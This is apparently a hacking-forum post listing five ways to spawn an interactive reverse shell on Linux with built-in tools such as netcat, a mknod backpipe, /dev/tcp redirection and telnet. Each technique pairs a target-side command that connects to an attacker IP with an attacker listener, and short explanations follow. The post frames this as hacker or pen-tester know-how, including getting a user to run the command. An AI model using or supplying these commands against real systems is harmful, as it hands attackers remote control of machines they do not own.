Spawning Reverse Shells

K

kingskrupellos2

New Member
Joined
November 2, 2025
Messages
3
Reaction score
0
Points
1

Preface​

This will be a short article which will demonstrates how to spawn an interactive reverse shell using built-in tools on any Linux distribution.
Also, it shows what mindset and what kind of creativity might be needed when being a hacker or pen tester.

But why?​

There are many distributions of Linux and they all do things a little different in regard to built-in tools and/or security mechanisms.
The following examples should be available no matter which OS is in front of you.

Test scenario​

  • being able to run a simple command, or
  • cause a user to run a simple command on the target system

Examples​

In the following examples there will always be a notion like A and T, which
will resemble Attacker and Target to show where to run the commands.

1. netcat​

nc <attacker_ip> <port> -e /bin/bash # T
nc -n -vv -l -p <port> # A

In current versions of netcat the -e flag probably won’t be available
anymore, but if it is this makes life really easy.

2. netcat with -e disabled​

One could just move on to other tools or means now since the -e flag
is not available anymore, but hey let’s make things look really complicated
and hacker-like
:wink:

mknod backpipe p; nc <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe # T
nc -n -vv -l -p <port> # A


netcat_no_e
netcat_no_e847×468 172 KB

What does this do?​

We create a FIFO file system object and use it as a backpipe to relay standard output from the commands piped from netcat to /bin/bash back to nc.

3. netcat without netcat​

/bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1 # T
nc -n -vv -l -p <port> # A


netcat_no_netcat
netcat_no_netcat855×509 150 KB

What does this do?​

It takes the /dev/tcp socket programming feature and uses it to redirect /bin/bash to a remote system.

4. netcat without netcat or /dev/tcp​

mknod backpipe p; telnet <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe # T
nc -n -vv -l -p <port> # A


netcat_no_netcat_no_dev_tcp
netcat_no_netcat_no_dev_tcp846×483 150 KB

What does this do?​

This should be clear by now. We just use telnet instead of netcat with the examples shown in 2nd example above.

5. telnet to telnet​

telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port> # T
nc -n -vv -l -p <1st_port> # A1
nc -n -vv -l -p <2nd_port> # A2



855×763 248 KB

 
You must log in or register to reply here.
Activity
So far there's no one here
  • Tags
    reverse shells
    • Top